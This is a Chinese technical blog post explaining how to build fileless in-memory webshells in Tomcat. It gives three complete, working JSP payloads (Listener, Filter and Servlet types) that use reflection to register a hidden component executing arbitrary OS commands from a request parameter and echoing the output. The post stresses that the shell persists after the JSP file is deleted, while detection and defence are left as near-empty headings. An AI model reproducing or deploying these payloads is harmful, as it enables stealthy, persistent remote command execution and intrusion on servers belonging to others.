Java内存马-Tomcat篇

已于 2022-05-08 17:06:39 修改
阅读量804 收藏 2
点赞数
文章标签: java web安全
于 2022-04-20 14:39:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mole_exp/article/details/123893144
版权

文章目录

内存马的分类

  • 利用Java Web组件(Servlet、Filter、Listener)

动态地创建Servlet、Filter或者Listener,解析请求参数,实现任意代码执行。在Spring框架利用Controller,Interceptor等组件也是类似的机制。

  • 修改字节码

利用Java的Instrument机制,动态注入Agent,在Java内存中动态修改字节码,在HTTP请求执行路径中的类中添加恶意代码,可以实现根据请求的参数执行任意代码。

内存马的实现

利用Java Web组件

利用Servlet、Filter、Listener实现内存马,我们需要两个条件,一是动态创建对象,二是能将创建的对象注册到HTTP的处理流中生效。

在Servlet3.0中,ServletContext提供了动态创建Servlet、Filter、Listener的方法:
在这里插入图片描述

public interface ServletContext {
  ... 
  FilterRegistration.Dynamic addFilter(String filterName,String className);
  FilterRegistration.Dynamic addFilter(String filterName,Filter filter);
  FilterRegistration.Dynamic addFilter(String filterName,Class<? extends Filter> filterClass);
  
  Dynamic addServlet(String var1, String var2);
  Dynamic addServlet(String var1, Servlet var2);
  Dynamic addServlet(String var1, Class<? extends Servlet> var2);
  
void addListener(String var1);
<T extends EventListener> void addListener(T var1);
void addListener(Class<? extends EventListener> var1); 
}

下面的编码和测试均在Tomcat 8.5.39环境下进行。

Listener型

Listener也称之为监听器,可以监听Application、Session和Request对象的创建、销毁事件,以及监听对其中添加、修改、删除属性事件,并自动执行自定义的功能。

正常的自定义Listener的流程:
(1) 自定义Listener类;
(2) 在web.xml中注册该Listener类。

代码如下:
ListenerDemo2.java

package me.mole.listener;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;
import javax.servlet.http.HttpServletResponse;

//实现ServletRequestListener接口,监听http请求事件
public class ListenerDemo2 implements ServletRequestListener {
    private HttpServletResponse response;

    /**
     * 如果按照正常的注册流程去注册的话,
     *   自定义的Listener需要有无参构造方法.
     *   否则tomcat启动会报错.
     */
    public ListenerDemo2() {
        System.out.println("ListenerDemo2() called...");
    }

    public ListenerDemo2(HttpServletResponse response) {
        System.out.println("ListenerDemo2(HttpServletResponse resp) called...");
        this.response = response;
    }

    @Override
    public void requestDestroyed(ServletRequestEvent sret) {
        System.out.println("ListenerDemo2 requestDestroyed");
    }

    @Override
    public void requestInitialized(ServletRequestEvent sret) {
        System.out.println("ListenerDemo2 requestInitialized");
    }
}

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <listener>
        <listener-class>me.mole.listener.ListenerDemo2</listener-class>
    </listener>
</web-app>

ServletRequestListener 用于监听 ServletRequest 对象的创建和销毁。注册 ServletRequestListener 后,每次请求发生时都会调用 requestInitialized() 方法。而我们可以从requestInitialized()方法的参数ServletRequestEvent中获取本次请求的ServletRequest对象。所以我们可以在requestInitialized()方法中添加恶意代码。

另外,由于我们默认无法在ServletRequestListener中获取HttpServletResponse对象,如果我们想要得到命令执行的回显,我们需要在实现ServletRequestListener的自定义类中定义一个自定义构造函数,并将HttpServletResponse作为参数传递给它。

关键是将我们的自定义侦听器添加到 Tomcat。

首先在 ServletContext 中有一个 addListener(T) 方法,实际上我们从 request.getServletContext() 得到的是ApplicationContextFacade ,它实现了 ServletContext 。通过查看 ApplicationContextFacade 中的源代码,我们可以看到它的底层调用堆栈如下所示。

ApplicationContextFacade#addListener(T)
  ->ApplicationContext#addListener(T)
  ->StandardContext#addApplicationEventListener(T)

如果我们使用 ApplicationContextFacade#addListener(T) 直接添加我们的监听器,是不会起作用的。因为ApplicationContext#addListener(T)方法会检查当前上下文的状态,如果它是Tomcat生命周期的准备启动阶段,否则会抛出IllegalStateException。源码如下:
在这里插入图片描述
在渗透测试过程中,我们通常通过文件上传功能、操作系统命令注入、远程代码执行漏洞等方式将我们的webshel​​l上传到目标服务器。但是所有这些情况都发生在目标 Web 服务器运行期间, this.context.getState() 不会等于 LifecycleState.STARING_PREP 。

所以我们应该调用 StandardContext#addApplicationEventListener(T) 来实现内存级别的 Webshel​​l的注入。

通过动态调试我们可以清楚的看到ApplicationContextFacade和StandardContext的关系:
在这里插入图片描述
由于ApplicationContextFacade中的成员变量context是私有的,而ApplicationContext中的成员变量context也是私有的,所以我们应该使用反射机制。

所以我们的Listener型内存马注入的代码如下:

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--
基于TomcatListener型内存Webshell
--%>
<%!
    public class ListenerDemo implements ServletRequestListener {
        private HttpServletResponse response;
        public ListenerDemo(HttpServletResponse response) {
            this.response = response;
        }
        @Override
        public void requestDestroyed(ServletRequestEvent sret) {
            System.out.println("requestDestroyed");
        }
        @Override
        public void requestInitialized(ServletRequestEvent sret) {
            try {
                System.out.println("requestInitialized");
                ServletRequest request = sret.getServletRequest();
                ServletOutputStream out = this.response.getOutputStream();
                String cmds = request.getParameter("listenerinjt");
                if (cmds != null) {
                    InputStream in = Runtime.getRuntime().exec(cmds.split(" ")).getInputStream();
                    StringBuilder sb = new StringBuilder();
                    BufferedReader br = new BufferedReader(new InputStreamReader(in));
                    String line = null;
                    while((line = br.readLine()) != null) {
                        sb.append(line).append("\n");
                    }
                    if (sb.length() > 0) {
                        out.print("<pre>");
                        out.write(sb.toString().getBytes());
                        out.print("</pre>");
                        out.flush();
                        out.close();
                    }
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
%>
<%
    ServletContext servletContext = request.getServletContext();
    ApplicationContextFacade appCtxFacade = (ApplicationContextFacade)servletContext;
    Field appCtxField = ApplicationContextFacade.class.getDeclaredField("context");
    appCtxField.setAccessible(true);
    ApplicationContext appCtx = (ApplicationContext)appCtxField.get(appCtxFacade);
    Field stdCtxField = ApplicationContext.class.getDeclaredField("context");
    stdCtxField.setAccessible(true);
    StandardContext stdCtx = (StandardContext)stdCtxField.get(appCtx);
    stdCtx.addApplicationEventListener(new ListenerDemo(response));
    out.println("injected!");
%>

在这里插入图片描述
在这里插入图片描述
即使我们删除了jsp webshel​​l文件,没关系,我们仍然可以访问webshel​​l。
在这里插入图片描述
在这里插入图片描述

Filter型

过滤器可对资源的请求(servlet或静态内容),或对资源的响应执行过滤任务,或者两者都执行。过滤器在doFilter方法中执行过滤。

正常的自定义Filter的流程:
(1) 自定义Filter类;
(2) 在web.xml中注册该Listener类。

代码如下:
FilterDemo.java

package me.mole.filter;

import javax.servlet.*;
import java.io.IOException;

//自定义Filter示例
public class FilterDemo implements Filter {

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        System.out.println("me.mole.filter.FilterDemo Filter init...");
    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
            throws IOException, ServletException {
        System.out.println("me.mole.filter.FilterDemo Filter doFilter...");
        filterChain.doFilter(servletRequest, servletResponse);
    }

    @Override
    public void destroy() {
        System.out.println("me.mole.filter.FilterDemo Filter destroy...");
    }
}

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

<filter>
    <filter-name>filterdemo</filter-name>
    <filter-class>me.mole.filter.FilterDemo</filter-class>
</filter>
<filter-mapping>
    <filter-name>filterdemo</filter-name>
    <url-pattern>/*</url-pattern>
</filter-mapping>
</web-app>

这里我们每个请求都会触发FilterDemo#doFilter()方法,这里下断:
在这里插入图片描述
查看 StandardWrapperValue#invoke():
在这里插入图片描述
那么 filterChain 是如何分配的呢?继续跟踪代码,您可以看到 filterChain 是由 ApplicationFilterFactory#createFilterChain() 动态创建的。
在这里插入图片描述
继续查看 ApplicationFilterFactory#createFilterChain() 的代码。我们可以看到 createFilterChain() 方法会根据 web.xml 文件中的设置创建一个过滤器链。然后,检查每个Filter的 urlPatterns 是否与请求的 url 匹配。如果是,则通过 context.findFilterConfig(String filterName) 获取ApplicationFilterConfig,并通过filterChain.addFilter() 添加ApplicationFilterConfig 到ApplicationFilterChain中。
在这里插入图片描述
如上面的代码所示,所有的过滤器信息都是通过 context.findFilterMaps() 获得的,FilterMap 对象包含了Filter的所有信息,包括filterName和 urlPatterns。
在这里插入图片描述
ApplicationFileConfig 的结构如下图所示:
在这里插入图片描述
最后,回到 StandardWrapperValue#invoke() ,filterChain 开始执行每个Filter的doFilter()方法。
在这里插入图片描述
在这里插入图片描述
因此,以下三个步骤用于动态创建自定义Filter,您可以通过 StandardContext 实现它:
(1) 添加自定义 filterDef ,然后重新生成 filterConfig ;
(2) 添加一个 filterMap ;
(3) 将 filterMap 移动到 数组filterMaps 的索引 0 处。(可选的

因此,Filter型内存马注入的代码如下:

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--
基于TomcatFilter型内存Webshell
--%>
<%!
    public class FilterDemo implements Filter {

        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
        }

        @Override
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain)
                throws IOException, ServletException {
            try {
                ServletOutputStream out = response.getOutputStream();
                String cmds = request.getParameter("filterinjt");
                if (cmds != null) {
                    InputStream in = Runtime.getRuntime().exec(cmds.split(" ")).getInputStream();
                    StringBuilder sb = new StringBuilder();
                    BufferedReader br = new BufferedReader(new InputStreamReader(in));
                    String line = null;
                    while((line = br.readLine()) != null) {
                        sb.append(line).append("\n");
                    }
                    if (sb.length() > 0) {
                        out.print("<pre>");
                        out.write(sb.toString().getBytes());
                        out.print("</pre>");
                        out.flush();
                        out.close();
                    }
                }
            } catch (Exception e) {
                e.printStackTrace();
            }

            filterChain.doFilter(request, response);
        }

        @Override
        public void destroy() {

        }
    }
%>
<%
    ServletContext servletContext = request.getServletContext();
    ApplicationContextFacade appCtxFacade = (ApplicationContextFacade)servletContext;
    Field appCtxField = ApplicationContextFacade.class.getDeclaredField("context");
    appCtxField.setAccessible(true);
    ApplicationContext appCtx = (ApplicationContext)appCtxField.get(appCtxFacade);
    Field stdCtxField = ApplicationContext.class.getDeclaredField("context");
    stdCtxField.setAccessible(true);
    StandardContext stdCtx = (StandardContext)stdCtxField.get(appCtx);

    //1. 添加filterDef
    FilterDemo filterDemo = new FilterDemo();
    FilterDef filterDef = new FilterDef();
    filterDef.setFilterClass("FilterDemo");
    filterDef.setFilterName(filterDemo.getClass().getName());
    filterDef.setFilter(filterDemo);
    stdCtx.addFilterDef(filterDef);
    //根据filterDefs重新生成filterConfig
    stdCtx.filterStart();
    //2. 添加filterMap
    FilterMap filterMap = new FilterMap();
    filterMap.setFilterName(filterDemo.getClass().getName());
    filterMap.setDispatcher("REQUEST");
    filterMap.addURLPattern("/*");
    stdCtx.addFilterMap(filterMap);
    //3. 将自定义filter移动到filterMaps数组的第0位置
    //  [这步非必要,只是为了提高filterChain的处理顺序],
    FilterMap[] filterMaps = stdCtx.findFilterMaps();
    FilterMap[] tmpFilterMaps = new FilterMap[filterMaps.length];
    int idx = 1;
    for (int i = 0; i < filterMaps.length; i++) {
        FilterMap tmpFilter = filterMaps[i];
        if (tmpFilter.getFilterName().equalsIgnoreCase(filterDemo.getClass().getName())) {
            tmpFilterMaps[0] = tmpFilter;
        } else {
            tmpFilterMaps[idx++] = tmpFilter;
        }
    }
    for (int i = 0; i < filterMaps.length; i++) {
        filterMaps[i] = tmpFilterMaps[i];
    }
    out.println("injected!");
%>

在这里插入图片描述
在这里插入图片描述
即使我们删除了jsp webshel​​l文件,没关系,我们仍然可以访问webshel​​l。
在这里插入图片描述
在这里插入图片描述

Servlet型

Servlet是运行在 Web 服务器或应用服务器上的程序,它是作为来自 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。它负责处理用户的请求,并根据请求生成相应的返回信息提供给用户。Servlet 可以理解为某一个路径后续的业务处理逻辑。

正常的定义Servlet的流程:
(1) 自定义Servlet类;
(2) 在web.xml中注册该Servlet类。

代码如下:
ServletDemo.java

package me.mole.servlet;

import javax.servlet.GenericServlet;
import javax.servlet.Servlet;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

//自定义Servlet示例
public class ServletDemo extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        try {
            System.out.println("me.mole.servlet.ServletDemo doGet...");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <servlet>
        <servlet-name>servletdemo</servlet-name>
        <servlet-class>me.mole.servlet.ServletDemo</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>servletdemo</servlet-name>
        <url-pattern>/servlet/servletdemo</url-pattern>
    </servlet-mapping>
</web-app>

来看看加载自定义 Servlet 后 StandardContext 的变化。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
如StandardContext的结构所示​​,它的成员 children,它是一个HashMap对象,每一项的值都是一个 StandardWrapper 对象。StandardWrapper用于装饰 Servlet 对象。

而另一个成员 servletMappings 也是一个HashMap对象,其中的每一项包含 url 和 servlet 之间的映射关系。

综上,以下三个步骤用于动态创建自定义 Servlet,您可以通过 StandardContext 实现它:
(1) 创建一个自定义的 Servlet 类;
(2) 创建一个 StandardWrapper 类,并用它来装饰 Servlet ;
(3) 将 StandardWrapper 对象添加到 StandardContext对象的成员属性children中 ;
(4) 将自定义的Servlet对象与url的映射关系添加到StandardContext中。

因此,Servlet型内存马的注入代码如下:

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="org.apache.catalina.core.StandardWrapper" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--
基于TomcatServlet型内存Webshell
--%>
<%!
    public class ServletDemo extends HttpServlet {

        @Override
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
            try {
                ServletOutputStream out = resp.getOutputStream();
                String cmds = req.getParameter("servletinjt");
                if (cmds != null) {
                    InputStream in = Runtime.getRuntime().exec(cmds.split(" ")).getInputStream();
                    StringBuilder sb = new StringBuilder();
                    BufferedReader br = new BufferedReader(new InputStreamReader(in));
                    String line = null;
                    while((line = br.readLine()) != null) {
                        sb.append(line).append("\n");
                    }
                    if (sb.length() > 0) {
                        out.print("<pre>");
                        out.write(sb.toString().getBytes());
                        out.print("</pre>");
                        out.flush();
                        out.close();
                    }
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        @Override
        protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
            doGet(req, resp);
        }
    }
%>
<%
    ServletContext servletContext = request.getServletContext();
    ApplicationContextFacade appCtxFacade = (ApplicationContextFacade)servletContext;
    Field appCtxField = ApplicationContextFacade.class.getDeclaredField("context");
    appCtxField.setAccessible(true);
    ApplicationContext appCtx = (ApplicationContext)appCtxField.get(appCtxFacade);
    Field stdCtxField = ApplicationContext.class.getDeclaredField("context");
    stdCtxField.setAccessible(true);
    StandardContext stdCtx = (StandardContext)stdCtxField.get(appCtx);

    ServletDemo servletDemo = new ServletDemo();
    StandardWrapper stdWrapper = new StandardWrapper();
    stdWrapper.setServletName("ServletDemo");
    stdWrapper.setServlet(servletDemo);
    stdWrapper.setServletClass(servletDemo.getClass().getName());
    stdCtx.addChild(stdWrapper);
    stdCtx.addServletMappingDecoded("/servletmem/*", "ServletDemo");;

    out.println("injected!");
%>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Java Web三大组件的加载顺序是:
Listener -> Filter-> Servlet

由于篇幅问题,剩余的内容另起文章记录。

SpringMVC Controller型

1、获得当前代码运行时的上下文环境
2、手动注册 Controller
3、Controller 中的 Webshell 逻辑

SpringMVC Interceptor型

Instrument内存马

内存马的检测

基于Instrument的Agent检测

RASP 运行时防护

Java中,RASP也是利用JVM的Instrument技术,在指定关键类的特定方法处进行hook。因此RASP能够感知内存马在内存中执行的一系列操作。

内存马的反检测

参考

[1] https://mp.weixin.qq.com/s/cbF2cdV9mnbGZWDwHuUoNA
[2] https://landgrey.me/blog/12/
[3] https://landgrey.me/blog/19/
[4] https://www.cnblogs.com/bitterz/p/14820898.html#12-向spring-mvc注入controller

xc8qanAFenlka@x1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RASP技术进阶系列(一):与WAF的“相爱相杀”
xsharkrasp的博客
12-09 495
当单独使用WAF或者RASP的时候,它们都因为自身的短板,在一些问题上显得力不从心。但当两者结合时,它们都将在自己擅长的领域大放异彩。
学习了解内存,看这篇就够了!(精华版)
热门推荐
MachineGunJoe666
06-21 1万+
目录 介绍: 一、内存简介 1.1 webshell变迁 1.2 如何实现webshell内存 1.3 内存类型 二、背景知识 2.1 Java web三大件 2.2Tomcat 2.3 其他java背景知识 三、内存实现 四、内存检测与排查 4.1源码检测 4.2 内存排查 介绍: 内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到..
浅析JavaWeb内存基础原理与查杀思路
道阻且长,行则将至。
04-04 3063
传统的 Webshell 后门很容易被当前 WAF、HIDS、EDR 等安全设备检测出来,于是无文件落地的内存技术得以诞生并快速发展。本文简要分析了Java内存的原理、分类,并实践了主流Webshell客户端管理工具内存的使用与当前应对内存的一些查杀思路、手段。
Java安全』Tomcat内存_动态注册Filter内存
Ho1aAs‘s Blog
03-23 1564
文章目录前言Filter生命周期Filter类介绍Servlet启动流程Filter调用流程分析1. 从Standardcontext获取filterMaps2. 遍历filterMap匹配url并调用了addFilter方法添加到filterChain3. 依次调用doFilterFilter内存原理Ⅰ. 获取contextⅡ. 生成恶意Filter用FilterDef封装添加到FilterDefsⅢ. 用filterConfig封装filterDefs添加到filterConfigsⅣ. 生成filt
浅析Tomcat架构上的Valve内存(内存系列篇十一)
ALLEN'Blog
02-27 516
这篇也是在Tomcat容器上面构造的内存(收回之前说的不搞Tomcat了),这是建立在Tomcat的管道上面做文章的一个内存的实现方式。这是内存系列的第十一篇文章了。根据前面Tomcat架构的相关知识,我们是知道对于Tomcat中的Container层有四个容器:EngineHostContextWrapper四个容器的具体实现为。四个容器中都包含有自己的管道对象,管道对象用来存放若干阀门对象。Tomcat为其分别制定了一个默认的基础阀门。
Java安全』Tomcat内存_动态注册Listener内存
Ho1aAs‘s Blog
03-24 1819
Java安全』反序列化- 文章目录前言Tomcat Servlet API Listener介绍ServletRequestListener介绍ServletRequestListener调用流程分析1. Request创建时2. Request销毁时Listener内存原理Ⅰ.获取contextⅡ. 生成恶意Listener获取ResponseⅢ. add添加listener完整代码参考引用完 前言 Tomcat Servlet API Listener介绍 Listener监听器用来监听对象创建、销
tomcat-redis-session-manager-1.2-tomcat-7-java-7
05-07
tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-...
Java-apache-tomcat-9.0.0.M27x64安装包-kaic.rar
04-30
Java_apache-tomcat-9.0.0.M27x64安装包_kaic.rar Java_apache-tomcat-9.0.0.M27x64安装包_kaic.rar Java_apache-tomcat-9.0.0.M27x64安装包_kaic.rar Java_apache-tomcat-9.0.0.M27x64安装包_kaic.rar Java_apache-...
开发工具 apache-tomcat-8.0.41-windows-x86
05-31
开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-windows-x86开发工具 apache-tomcat-8.0.41-...
2024年java面试题-tomcat面试题
最新发布
04-26
Tomcat是一个JSP/Servlet容器。...本资料是关于java面试中可能会提及到的关于web服务器tomcat的相关面试题,更多的是一些八股文吧,可以空闲的时候背一背,应付下面试和平常的coding借鉴还是有帮助的!!!
apache-tomcat-7.0.96
03-23
apache-tomcat-7.0.96
tomcat配置技巧
08-23 1112
1. 配置系统管理(Admin Web Application) 大多数商业化的J2EE服务器都提供一个功能强大的管理界面,且大都采用易于理解的Web应用界面。Tomcat按照自己的方式,同样提供一个成熟的管理工具,并且丝毫不逊于那些商业化的竞争对手。Tomcat的Admin Web Application最初在4.1版本时出现,当时的功能包括管理context、data source、user和
Java内存基础
m0_46317063的博客
02-05 357
filter内存基础
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3129
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
[Java安全]—Controller内存
Sentiment的博客
11-02 558
Controller内存
红队视角下Java内存的应用
include_voidmain的博客
11-07 721
红队视角下Java内存的应用
关于Java/Python/PHP 内存
2301_80115097的博客
11-15 490
因为内存种类繁杂,每次都要翻看很多文章,又加上最近有某个大活动,因此就写了这篇文章来总结一下常见的3种语言(PHP、Python、JAVA)的内存的注入方法和查杀方法,并尝试自己完成一个内存查杀工具的实现。希望本篇文章能给师傅们带来一些启发。文章一长就难免在表达和准确性上有所疏漏,如有错误或不足,请师傅们指正。
【Web】小白友好的Java内存基础学习笔记
uuzeray的博客
02-10 874
内存(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代码注入到系统内存中并执行。与传统的攻击方式不同,内存不需要将恶意代码写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代码不会留下明显的痕迹或文件。此外,由于直接在内存中执行,内存攻击也更难以被检测和追踪。
java内存学习与理解
Shanfenglan's blog
11-08 5712
文章目录1. 前置知识1.1 java web 核心组件listenerfilterfilter的生命周期filter链servlet2. tomcat2.1 核心组件1. connector组件2. container组件 1. 前置知识 1.1 java web 核心组件 首先我们得知道,java网站都一定会有一个web容器。 listener 本质是一个java类。 作用是监听Application、Session和Request三大对象创建或者删除,然后根据监听的结果来执行提前编写的代码。 可以简单
ps -ef |grep java|grep apache-tomcat-9.0.44-9093 具体含义
08-09
引用中提到了一系列命令和文件目录,其中包括使用的工具Xshell 7和Xftp 7,以及安装的Tomcat版本为apache-tomcat-9.0.33.tar.gz。在第二步中,通过执行命令`mkdir /usr/java`在`/usr/`目录下创建了一个名为java的目录。然后通过`cd /usr/tomcat`进入tomcat目录,再通过`cd ..`返回到usr目录。最后通过`ls`命令查看目录中的文件。 问题: `ps -ef |grep java|grep apache-tomcat-9.0.44-9093`的具体含义是什么? 回答: `ps -ef |grep java|grep apache-tomcat-9.0.44-9093`是一个Linux命令,它的含义是通过查找正在运行的进程(使用`ps -ef`命令),然后通过管道(`|`)将结果传递给下一个命令,使用`grep`命令来过滤包含关键字"java"和"apache-tomcat-9.0.44-9093"的进程。换句话说,它用来检索正在运行的与Java和指定Tomcat版本相关的进程信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值